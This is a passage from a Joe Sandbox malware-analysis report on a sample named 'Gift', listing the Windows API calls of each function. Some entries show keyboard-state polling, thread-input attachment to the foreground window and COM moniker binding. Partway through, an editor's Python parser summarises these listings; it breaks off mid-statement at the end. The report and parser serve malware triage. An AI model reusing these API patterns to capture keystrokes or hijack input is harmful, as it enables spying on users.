                                                                          • Instruction ID: 7e8a1a2e9f8c97f0a3fa3b44cc6e1579b9304f6003c90b0f47e954cc8e51c4c5
                                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                          • Instruction Fuzzy Hash: C571D871A1571BABE7149E79CC51B7AF3A8AF103A0F144239FA14D73C1EB70DA648B90
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00332CE9
                                                                          • GetMenuItemInfoW.USER32(00397890,000000FF,00000000,00000030), ref: 00332D4A
                                                                          • SetMenuItemInfoW.USER32(00397890,00000004,00000000,00000030), ref: 00332D80
                                                                          • Sleep.KERNEL32(000001F4), ref: 00332D92
                                                                          • GetMenuItemCount.USER32(?), ref: 00332DD6
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00332DF2
                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00332E1C
                                                                          • GetMenuItemID.USER32(?,?), ref: 00332E61
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00332EA7
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332EBB
                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332EDC
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                          • String ID:
                                                                          • API String ID: 4176008265-0
                                                                          • Opcode ID: 9fdc386eb1b395340dbde5ac01eb4bad2308562f5967a89310c1d006c74188c5
                                                                          • Instruction ID: 9e8445c7c2189ed5ba4f152aa256974120563d74599366ba55bc45415220c37e
                                                                          • Opcode Fuzzy Hash: 9fdc386eb1b395340dbde5ac01eb4bad2308562f5967a89310c1d006c74188c5
                                                                          • Instruction Fuzzy Hash: D261BC70900249AFDB22CF64CCCAABFBBBCEB41304F15445AF951A72A1D772AD45DB21
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003575CA
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003575CD
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003575F1
                                                                          • _memset.LIBCMT ref: 00357602
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00357614
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0035768C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 830647256-0
                                                                          • Opcode ID: 82c40c605643468e31c00cf060854b6cba0daa90fbacdd878435760c7b95341f
                                                                          • Instruction ID: 2fa56b9c5c1d009ffb1d9386b418987ae44a96dcab540e13e27d022e359d2543
                                                                          • Opcode Fuzzy Hash: 82c40c605643468e31c00cf060854b6cba0daa90fbacdd878435760c7b95341f
                                                                          • Instruction Fuzzy Hash: 0D61AB75904208AFDB12DFA4DC81EEE77F8EB09740F10019AFE15A72A1D770AD45DB60
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003277DD
                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00327836
                                                                          • VariantInit.OLEAUT32(?), ref: 00327848
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00327868
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 003278BB
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 003278CF
                                                                          • VariantClear.OLEAUT32(?), ref: 003278E4
                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 003278F1
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003278FA
                                                                          • VariantClear.OLEAUT32(?), ref: 0032790C
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00327917
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: 8f74a308f60683fa5b958f8ec6f6551bbe81e541d2dfa77aa2fe7f84e6fe35d4
                                                                          • Instruction ID: 0e59f20922864e3b99373b08ba031e5d35491c3ef6061e0f77bfa8ed73ba0736
                                                                          • Opcode Fuzzy Hash: 8f74a308f60683fa5b958f8ec6f6551bbe81e541d2dfa77aa2fe7f84e6fe35d4
                                                                          • Instruction Fuzzy Hash: 29417735A00219DFCB16DFA9D849DAEBBB9FF08340F00C469E955A7261CB70E945CF90
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00330530
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003305B1
                                                                          • GetKeyState.USER32(000000A0), ref: 003305CC
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003305E6
                                                                          • GetKeyState.USER32(000000A1), ref: 003305FB
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00330613
                                                                          • GetKeyState.USER32(00000011), ref: 00330625
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0033063D
                                                                          • GetKeyState.USER32(00000012), ref: 0033064F
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00330667
                                                                          • GetKeyState.USER32(0000005B), ref: 00330679
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: d73d9b0b32b53bbca133c7558301f4f2317f9f80a840422a01c4fb298f6ff7b1
                                                                          • Instruction ID: c82e49e56686710485724bc460db60e3db74d36c4a9ab0710df5c034ac91720b
                                                                          • Opcode Fuzzy Hash: d73d9b0b32b53bbca133c7558301f4f2317f9f80a840422a01c4fb298f6ff7b1
                                                                          • Instruction Fuzzy Hash: E341DB305087C96DFF3B876488A53B6FEA4AB52304F09805ED6C6475C1EBE499D4CF92
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • CoInitialize.OLE32 ref: 00348AED
                                                                          • CoUninitialize.OLE32 ref: 00348AF8
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00363BBC,?), ref: 00348B58
                                                                          • IIDFromString.OLE32(?,?), ref: 00348BCB
                                                                          • VariantInit.OLEAUT32(?), ref: 00348C65
                                                                          • VariantClear.OLEAUT32(?), ref: 00348CC6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 834269672-1287834457
                                                                          • Opcode ID: fa7a7f2fcc2d17c247c63f44333308ff5f49b1d4113e10159a789ed39a50ea45
                                                                          • Instruction ID: a23cb0e31ee4feb116ae6be422a735daefd81dae3314effb767641f38cd1c089
                                                                          • Opcode Fuzzy Hash: fa7a7f2fcc2d17c247c63f44333308ff5f49b1d4113e10159a789ed39a50ea45
                                                                          • Instruction Fuzzy Hash: 19618C706087119FD712EF64C889B6EF7E8EF44714F00485AF9859B691CB70ED48CBA2
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0033BB13
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0033BB89
                                                                          • GetLastError.KERNEL32 ref: 0033BB93
                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0033BC00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: f209405bc010a75eb33f40d5813499617b906d1250b23eb40e688f936f29d1a7
                                                                          • Instruction ID: 1299edad2fb6d3c64332cd6ec575b10bc0e4396cca79e72b2cfa1c21e3d1396d
                                                                          • Opcode Fuzzy Hash: f209405bc010a75eb33f40d5813499617b906d1250b23eb40e688f936f29d1a7
                                                                          • Instruction Fuzzy Hash: CE31B035A00309AFCB12EF65C896EAEF7B8EF44340F14856AEA06D7295DF709D01CB91
                                                                          APIs
                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0033357C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoad
                                                                          • String ID: ,z90z9$,z90z9$blank$info$question$stop$warning
                                                                          • API String ID: 2457776203-2095212449
                                                                          • Opcode ID: 78ff4887eb9b493475f4c400784746f7fccab8d8ad49ec76b4950a46950ca50e
                                                                          • Instruction ID: 634b51c2c4f3449a34a89b72c5c713a36539a65f59c6b71c0479d536bd7a8c57
                                                                          • Opcode Fuzzy Hash: 78ff4887eb9b493475f4c400784746f7fccab8d8ad49ec76b4950a46950ca50e
                                                                          • Instruction Fuzzy Hash: D8110D7164834BBEFB079A14DCD2DBBB79CDF06360F20406AF6045A181E7A4AF404BB0
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00329BCC
                                                                          • GetDlgCtrlID.USER32 ref: 00329BD7
                                                                          • GetParent.USER32 ref: 00329BF3
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00329BF6
                                                                          • GetDlgCtrlID.USER32(?), ref: 00329BFF
                                                                          • GetParent.USER32(?), ref: 00329C1B
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00329C1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: 254d77198c6aaea97e53e85591c3600c9ea52663c860f104e3a04a7f0507ebfb
                                                                          • Instruction ID: 42ea072a399858c903a2032060dcdfb4b3fa5174c551f2b1331900b085d2c772
                                                                          • Opcode Fuzzy Hash: 254d77198c6aaea97e53e85591c3600c9ea52663c860f104e3a04a7f0507ebfb
                                                                          • Instruction Fuzzy Hash: 5B21F170940114ABDF06AB65DC95EFEBBB8EF95300F104156F961972A1DBB44824DB20
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00329CB5
                                                                          • GetDlgCtrlID.USER32 ref: 00329CC0
                                                                          • GetParent.USER32 ref: 00329CDC
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00329CDF
                                                                          • GetDlgCtrlID.USER32(?), ref: 00329CE8
                                                                          • GetParent.USER32(?), ref: 00329D04
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00329D07
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: 170fd88c203a21982e6781b3ebc5173958123153bc4b5a62bbd8555021ad27ae
                                                                          • Instruction ID: ab5a2cc0dc20eddde76e51e161a2530b1526cae9d91af733b137eff14fa7e2cb
                                                                          • Opcode Fuzzy Hash: 170fd88c203a21982e6781b3ebc5173958123153bc4b5a62bbd8555021ad27ae
                                                                          • Instruction Fuzzy Hash: 7721F571D40114BFDF06AB65CC95EFEBBB9EF95300F104012F961972A1DBB54924DB20
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00329D27
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00329D3C
                                                                          • _wcscmp.LIBCMT ref: 00329D4E
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00329DC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 1704125052-3381328864
                                                                          • Opcode ID: f53e88d737c69500bb89319abd692c9e3421a060723460fda2d8e60722a00022
                                                                          • Instruction ID: ec8f3fcfdede00e7a024447e1c875f0f4f9582e5587cd0dcef05972ab1804358
                                                                          • Opcode Fuzzy Hash: f53e88d737c69500bb89319abd692c9e3421a060723460fda2d8e60722a00022
                                                                          • Instruction Fuzzy Hash: F2112C7624872ABAF6077624FC07EF7B39CDB05360F200067FA04A44D1FEA5A9616E75
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00348FC1
                                                                          • CoInitialize.OLE32(00000000), ref: 00348FEE
                                                                          • CoUninitialize.OLE32 ref: 00348FF8
                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 003490F8
                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00349225
                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00363BDC), ref: 00349259
                                                                          • CoGetObject.OLE32(?,00000000,00363BDC,?), ref: 0034927C
                                                                          • SetErrorMode.KERNEL32(00000000), ref: 0034928F
                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0034930F
                                                                          • VariantClear.OLEAUT32(?), ref: 0034931F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2395222682-0
                                                                          • Opcode ID: 22df5bc39b8c78da6d9dbaa6327779b3ddcc394f77a171b22fe16b45caf3a41a
                                                                          • Instruction ID: fb6767ac9dc113e9d61a1d117ba8932d97c5fbbbd5e59e44e655e1d195d5574a
                                                                          • Opcode Fuzzy Hash: 22df5bc39b8c78da6d9dbaa6327779b3ddcc394f77a171b22fe16b45caf3a41a
                                                                          • Instruction Fuzzy Hash: 75C14471608305AFD705DF64C885A6BB7E9FF89308F00491EF98A9B261DB71ED05CB52
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 003319EF
                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331A03
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00331A0A
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330A67,?,00000001), ref: 00331A19
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00331A2B
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330A67,?,00000001), ref: 00331A44
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330A67,?,00000001), ref: 00331A56
                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331A9B
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331AB0
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331ABB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: a9a8737e589727742256e87e306ad91db331956f305faad92a4217008ea81c30
                                                                          • Instruction ID: 7e570d1069bb7813b05b37bd0b1a4df4cb4d6bba72c9fc822374a7b2308ea5d7
                                                                          • Opcode Fuzzy Hash: a9a8737e589727742256e87e306ad91db331956f305faad92a4217008ea81c30
                                                                          • Instruction Fuzzy Hash: 4D31E471522204BFDB17DF14EC85F7B77AEEB95316F128116F801C6190DBB59D408B60
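The two entries above (the COM moniker lookup that ends at ref 0034931F and the GetForegroundWindow / AttachThreadInput sequence just listed) are the kind of function listing an analyst wants in machine-readable form: which APIs a function calls, how often, from which module, and how many argument slots Joe Sandbox could not resolve. The parser below is an added example written by the editor; it is not part of the Joe Sandbox report or of Joe Security's tooling. SAMPLE is constructed by copying lines from this report, and BEHAVIOUR_HINTS is the editor's own lookup table of what each API does, not a mapping Joe Sandbox defines.

```python
"""Parse and summarise the "APIs" listings of a Joe Sandbox function dump.

Added example (editor's own code, not from the Joe Sandbox report).
SAMPLE is constructed from lines copied out of the report; BEHAVIOUR_HINTS
is the editor's own table, not a Joe Sandbox signature mapping.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional, Tuple

# One call-site line, e.g.
#   • AttachThreadInput.USER32(00000000,00000000,00000001,?), ref: 00331A19
#   • GetDlgCtrlID.USER32 ref: 00329CC0
#   • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Editor's own notes on what each API is for (assumption: useful triage hints,
# not the sandbox's own signature logic).
BEHAVIOUR_HINTS = {
    "AttachThreadInput": "attaches to another thread's input queue (focus/input state of the foreground window)",
    "GetForegroundWindow": "locates the window the user is currently interacting with",
    "GetAsyncKeyState": "polls key or mouse-button state without installing a hook",
    "CoGetObject": "binds a COM object from a moniker string (e.g. a winmgmts: path)",
    "GetRunningObjectTable": "looks up COM objects that are already running",
    "EnumChildWindows": "walks child windows, typically to find a control by class name",
    "VirtualFree": "releases a manually allocated memory region",
}


@dataclass(frozen=True)
class ApiCall:
    api: str                  # e.g. AttachThreadInput
    module: str               # e.g. USER32
    args: Tuple[str, ...]     # raw argument tokens; "?" means unresolved at analysis time
    ref: str                  # call-site address inside the dump
    caller: Optional[str]     # set for "Part of subcall function <addr>" lines


def parse_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one bullet line, or None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
    return ApiCall(m["api"], m["module"], args, m["ref"].upper(), m["caller"])


def parse_entries(text: str):
    """Split the dump on its "APIs" headings and parse each function's call list."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        call = parse_line(line)
        if call is not None and current is not None:
            current.append(call)
    return [e for e in entries if e]


def summarise(entry):
    """Return (api counter, module counter, hints for the APIs in BEHAVIOUR_HINTS)."""
    apis = Counter(c.api for c in entry)
    modules = Counter(c.module for c in entry)
    hints = {api: BEHAVIOUR_HINTS[api] for api in apis if api in BEHAVIOUR_HINTS}
    return apis, modules, hints


def unresolved_ratio(entry) -> float:
    """Share of argument slots the sandbox printed as '?' (unresolved)."""
    slots = [a for c in entry for a in c.args]
    return sum(a == "?" for a in slots) / len(slots) if slots else 0.0


# Constructed sample: two entries copied from the report above.
SAMPLE = """\
APIs
  • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00329CB5
• GetDlgCtrlID.USER32 ref: 00329CC0
Memory Dump Source
• Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
APIs
• GetCurrentThreadId.KERNEL32 ref: 003319EF
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331A03
• GetWindowThreadProcessId.USER32(00000000), ref: 00331A0A
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330A67,?,00000001), ref: 00331A19
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00331A2B
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00330A67,?,00000001), ref: 00331ABB
"""

if __name__ == "__main__":
    for i, entry in enumerate(parse_entries(SAMPLE), 1):
        apis, modules, hints = summarise(entry)
        print(f"function {i}: {dict(apis)} modules={dict(modules)} "
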